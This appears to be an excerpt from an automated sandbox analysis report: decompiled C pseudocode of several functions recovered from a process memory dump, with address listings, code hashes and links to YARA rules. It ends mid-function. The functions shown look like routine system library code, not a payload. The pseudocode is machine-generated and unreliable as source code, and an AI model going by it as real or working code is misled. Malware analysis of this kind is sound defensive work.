				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x37bd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E036D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0370B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x37b7b9c; // 0x0
					_t74 = L036E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03709650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L036E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0370F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E037013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L036E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03709650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                      0x036cc608
                                      0x036cc615
                                      0x036cc625
                                      0x036cc62d
                                      0x036cc635
                                      0x036cc640
                                      0x036cc680
                                      0x036cc687
                                      0x036cc688
                                      0x036cc689
                                      0x036cc694
                                      0x036cc694
                                      0x036cc642
                                      0x036cc64a
                                      0x036cc697
                                      0x03737a25
                                      0x03737a2b
                                      0x03737a2e
                                      0x03737a30
                                      0x03737bea
                                      0x03737bea
                                      0x00000000
                                      0x03737bea
                                      0x03737a36
                                      0x03737a43
                                      0x03737a48
                                      0x03737a4c
                                      0x03737a4e
                                      0x00000000
                                      0x00000000
                                      0x03737a58
                                      0x03737a5a
                                      0x03737a5b
                                      0x03737a5c
                                      0x03737a5d
                                      0x03737a63
                                      0x03737a64
                                      0x03737a6a
                                      0x03737a6c
                                      0x03737a6e
                                      0x037379cb
                                      0x037379cb
                                      0x037379ce
                                      0x037379d0
                                      0x03737a98
                                      0x03737a9b
                                      0x03737a9b
                                      0x03737a9e
                                      0x03737aa1
                                      0x03737bbe
                                      0x03737bbe
                                      0x03737bc0
                                      0x03737be0
                                      0x03737be0
                                      0x03737a01
                                      0x03737a01
                                      0x03737a05
                                      0x03737a07
                                      0x03737a15
                                      0x03737a15
                                      0x03737a1a
                                      0x00000000
                                      0x03737a1a
                                      0x03737bc2
                                      0x03737bc6
                                      0x03737bc9
                                      0x03737bcd
                                      0x03737bcf
                                      0x037379e6
                                      0x037379e6
                                      0x037379eb
                                      0x037379eb
                                      0x037379ef
                                      0x037379f1
                                      0x00000000
                                      0x00000000
                                      0x037379f3
                                      0x037379f5
                                      0x037379ff
                                      0x037379ff
                                      0x00000000
                                      0x037379ff
                                      0x037379f7
                                      0x037379fd
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x037379fd
                                      0x03737bd5
                                      0x03737bd8
                                      0x00000000
                                      0x00000000
                                      0x03737ba9
                                      0x03737bac
                                      0x03737bb0
                                      0x03737bb1
                                      0x03737bb1
                                      0x03737bb6
                                      0x00000000
                                      0x03737bb6
                                      0x03737aa7
                                      0x03737aaa
                                      0x00000000
                                      0x00000000
                                      0x03737ab2
                                      0x03737ab3
                                      0x03737ab5
                                      0x03737aec
                                      0x03737aef
                                      0x03737b25
                                      0x03737b28
                                      0x03737b62
                                      0x03737b64
                                      0x03737b8f
                                      0x03737b92
                                      0x03737b96
                                      0x03737b98
                                      0x00000000
                                      0x00000000
                                      0x03737b9e
                                      0x03737b9f
                                      0x03737ba3
                                      0x00000000
                                      0x03737ba3
                                      0x03737b66
                                      0x03737b68
                                      0x03737ae2
                                      0x03737ae2
                                      0x00000000
                                      0x03737ae2
                                      0x03737b6e
                                      0x03737b72
                                      0x03737b75
                                      0x03737b81
                                      0x03737b85
                                      0x03737b87
                                      0x00000000
                                      0x00000000
                                      0x03737b31
                                      0x03737b34
                                      0x03737b3c
                                      0x03737b45
                                      0x03737b46
                                      0x03737b4f
                                      0x03737b51
                                      0x03737b57
                                      0x03737b59
                                      0x03737b59
                                      0x00000000
                                      0x03737b59
                                      0x03737b77
                                      0x00000000
                                      0x03737b77
                                      0x03737b2a
                                      0x00000000
                                      0x03737b2a
                                      0x03737af1
                                      0x03737af3
                                      0x00000000
                                      0x00000000
                                      0x03737afb
                                      0x03737afc
                                      0x03737afe
                                      0x00000000
                                      0x00000000
                                      0x03737b00
                                      0x03737b03
                                      0x00000000
                                      0x00000000
                                      0x03737b05
                                      0x03737b09
                                      0x03737b0d
                                      0x03737b0f
                                      0x00000000
                                      0x00000000
                                      0x03737b18
                                      0x03737b1d
                                      0x00000000
                                      0x03737b1d
                                      0x03737ab7
                                      0x03737ab9
                                      0x00000000
                                      0x00000000
                                      0x03737abf
                                      0x03737ac1
                                      0x00000000
                                      0x00000000
                                      0x03737ac3
                                      0x03737ac6
                                      0x00000000
                                      0x00000000
                                      0x03737ac8
                                      0x03737acc
                                      0x03737ad0
                                      0x03737ad2
                                      0x00000000
                                      0x00000000
                                      0x03737adb
                                      0x00000000
                                      0x03737adb
                                      0x037379d6
                                      0x037379d9
                                      0x037379dc
                                      0x03737a91
                                      0x03737a94
                                      0x00000000
                                      0x03737a94
                                      0x037379e2
                                      0x00000000
                                      0x037379e2
                                      0x03737a74
                                      0x03737a7a
                                      0x00000000
                                      0x00000000
                                      0x03737a8a
                                      0x03737a21
                                      0x03737a21
                                      0x00000000
                                      0x03737a21
                                      0x036cc650
                                      0x036cc651
                                      0x036cc656
                                      0x036cc65c
                                      0x036cc65d
                                      0x036cc663
                                      0x036cc664
                                      0x036cc66a
                                      0x036cc66e
                                      0x037379c5
                                      0x037379c7
                                      0x00000000
                                      0x037379c7
                                      0x036cc67a
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 48e260e20a937b6a77be8f745e4595e9b41d98e10454cf15786b5898eafc9e54
                                      • Instruction ID: 1c3e0a4510b9185d17686c701e32dd661725c66d1ca487d625a8effb9cb1c4a4
                                      • Opcode Fuzzy Hash: 48e260e20a937b6a77be8f745e4595e9b41d98e10454cf15786b5898eafc9e54
                                      • Instruction Fuzzy Hash: C88192B56043859BCB29CF18C880B7BB3E8EB86350F18496EED459B642D331DD45CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03746DC9, Relevance: .2, Instructions: 199COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E03746DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03746B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E036E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03709AE0();
					_t87 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0374795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0374795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0374795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0374795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L036E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03746B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03746B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03746B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03746B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E036E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03709AE0();
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L036E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L036E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L036E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L036E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                      0x03746dd4
                                      0x03746dde
                                      0x03746de1
                                      0x03746de3
                                      0x03746de6
                                      0x03746de9
                                      0x03746dec
                                      0x03746def
                                      0x03746df2
                                      0x03746df5
                                      0x03746dfe
                                      0x03746e04
                                      0x03746e09
                                      0x03746e0d
                                      0x03746e18
                                      0x03746e1b
                                      0x03746e22
                                      0x03746e2d
                                      0x03746e30
                                      0x03746e36
                                      0x03746e42
                                      0x03746e4d
                                      0x03746e50
                                      0x03746e55
                                      0x03746e5c
                                      0x03746e6e
                                      0x03746e5e
                                      0x03746e67
                                      0x03746e67
                                      0x03746e73
                                      0x03746e74
                                      0x03746e77
                                      0x03746e7c
                                      0x03746e7d
                                      0x03746e8e
                                      0x03746e93
                                      0x03746e9c
                                      0x03746ea8
                                      0x03746eab
                                      0x03746eac
                                      0x03746eb3
                                      0x03746ecd
                                      0x03746edc
                                      0x03746ee2
                                      0x03746ee5
                                      0x03746ef2
                                      0x03746efb
                                      0x03746f01
                                      0x03746f06
                                      0x03746f0b
                                      0x03746f11
                                      0x03746f1a
                                      0x03746f22
                                      0x03746f26
                                      0x03746f26
                                      0x03746f33
                                      0x03746f41
                                      0x03746f44
                                      0x03746f47
                                      0x03746f54
                                      0x03746f65
                                      0x03746f77
                                      0x03746f7c
                                      0x03746f82
                                      0x03746f91
                                      0x03746f99
                                      0x03746fa3
                                      0x03746fae
                                      0x03746fae
                                      0x03746fba
                                      0x03746fbb
                                      0x03746fbc
                                      0x03746fc1
                                      0x03746fc2
                                      0x03746fd3
                                      0x03746fd8
                                      0x03746fd8
                                      0x03746fdf
                                      0x03746fe8
                                      0x03746fee
                                      0x03746fee
                                      0x03746ff5
                                      0x03746ffb
                                      0x03746ffb
                                      0x03747004
                                      0x00000000
                                      0x0374700a
                                      0x03747004
                                      0x03746eb3
                                      0x03746e9c
                                      0x03747015

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction ID: 49556ab9175ce6d82631277dbda18f05cc08d7c27687d61b1be7b7bfb3b8656d
                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                      • Instruction Fuzzy Hash: 4F717A76A00219EFCB15DFA9C984EAEFBB9FF48700F144569E505AB250DB30EA45CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0375B8D0, Relevance: .2, Instructions: 199COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 39%
                                      			E0375B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x37b7b9c; // 0x0
				_t124 = L036E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03709800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E037095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E037095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L036E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03709910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E037095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x37b7b9c; // 0x0
									_t92 = L036E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03709910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E036CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0375E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0375E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E037095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                      0x0375b8d9
                                      0x0375b8e4
                                      0x00000000
                                      0x0375b8e6
                                      0x0375b8f3
                                      0x0375b8f5
                                      0x0375b8f5
                                      0x0375b8f8
                                      0x0375b920
                                      0x0375b924
                                      0x0375b936
                                      0x0375b939
                                      0x0375b93d
                                      0x0375b948
                                      0x0375b9a0
                                      0x0375b9a0
                                      0x0375b9a4
                                      0x0375b9bf
                                      0x0375b9c4
                                      0x0375b9c6
                                      0x0375b9cd
                                      0x0375b9d1
                                      0x0375bad4
                                      0x0375bad8
                                      0x0375bada
                                      0x0375badc
                                      0x0375badc
                                      0x0375badf
                                      0x0375bae0
                                      0x0375bae2
                                      0x0375bae4
                                      0x0375baec
                                      0x0375baee
                                      0x0375baf0
                                      0x0375baf0
                                      0x0375baec
                                      0x0375bafb
                                      0x0375bafc
                                      0x0375bafe
                                      0x0375bb01
                                      0x0375bb01
                                      0x00000000
                                      0x0375bb06
                                      0x0375b9d7
                                      0x0375b9db
                                      0x0375b9db
                                      0x0375b9de
                                      0x0375b9de
                                      0x0375b9e4
                                      0x0375b9e7
                                      0x0375b9ea
                                      0x0375b9ec
                                      0x0375b9ef
                                      0x0375b9f3
                                      0x0375ba1b
                                      0x0375ba1b
                                      0x0375ba23
                                      0x0375ba24
                                      0x0375ba27
                                      0x0375ba2a
                                      0x0375ba2b
                                      0x0375ba2e
                                      0x0375ba30
                                      0x0375ba37
                                      0x0375ba3f
                                      0x0375ba9c
                                      0x0375baa2
                                      0x0375bb13
                                      0x0375bb15
                                      0x0375baae
                                      0x0375baae
                                      0x0375bab3
                                      0x0375bab5
                                      0x0375baba
                                      0x0375bac8
                                      0x0375bac8
                                      0x0375baba
                                      0x0375bacd
                                      0x0375bacf
                                      0x00000000
                                      0x0375bacf
                                      0x0375bb1a
                                      0x00000000
                                      0x0375bb1c
                                      0x0375baa7
                                      0x0375bb11
                                      0x00000000
                                      0x0375bb11
                                      0x0375baa9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0375ba41
                                      0x0375ba41
                                      0x0375ba41
                                      0x0375ba58
                                      0x0375ba5d
                                      0x0375ba62
                                      0x00000000
                                      0x00000000
                                      0x0375ba64
                                      0x0375ba67
                                      0x0375ba68
                                      0x0375ba69
                                      0x0375ba6c
                                      0x0375ba6f
                                      0x0375ba71
                                      0x0375ba78
                                      0x0375ba80
                                      0x00000000
                                      0x00000000
                                      0x0375ba90
                                      0x0375ba90
                                      0x0375ba97
                                      0x00000000
                                      0x0375ba97
                                      0x0375b9f5
                                      0x0375b9f7
                                      0x0375b9f7
                                      0x0375b9fa
                                      0x0375ba03
                                      0x0375ba07
                                      0x0375ba0c
                                      0x0375ba10
                                      0x0375ba17
                                      0x00000000
                                      0x0375b9f7
                                      0x0375b9a6
                                      0x0375b9a8
                                      0x0375b9af
                                      0x0375b9b3
                                      0x00000000
                                      0x00000000
                                      0x0375b9b9
                                      0x00000000
                                      0x0375b9b9
                                      0x0375b94d
                                      0x0375b98f
                                      0x0375b995
                                      0x0375b999
                                      0x0375b960
                                      0x0375b967
                                      0x0375b968
                                      0x0375b96a
                                      0x00000000
                                      0x0375b96a
                                      0x0375b99b
                                      0x0375b99e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0375b99e
                                      0x0375b951
                                      0x0375b954
                                      0x0375b95a
                                      0x0375b95e
                                      0x0375b972
                                      0x0375b979
                                      0x0375b97d
                                      0x0375b97f
                                      0x0375b980
                                      0x0375b982
                                      0x0375b984
                                      0x00000000
                                      0x0375b984
                                      0x00000000
                                      0x0375b926
                                      0x00000000
                                      0x0375b926

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 966129f01b94c7895360511a1083ece612a7682103a47da7d25cb0c802163484
                                      • Instruction ID: f07d4800df780a2f98043e27f2dc242f9e998285a6df5fa603bd253056bb060e
                                      • Opcode Fuzzy Hash: 966129f01b94c7895360511a1083ece612a7682103a47da7d25cb0c802163484
                                      • Instruction Fuzzy Hash: 0F710F36200705EFDB39CF25C889F66BBE5EB40720F284528FA558B6E0DBB4E945DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C52A5, Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E036C52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E036DEEF0(0x37b79a0);
					_t104 =  *0x37b8210; // 0x2e82ba8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E036DEB70(_t93, 0x37b79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03709890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E036DEEF0(0x37b79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E036DEB70(0, 0x37b79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
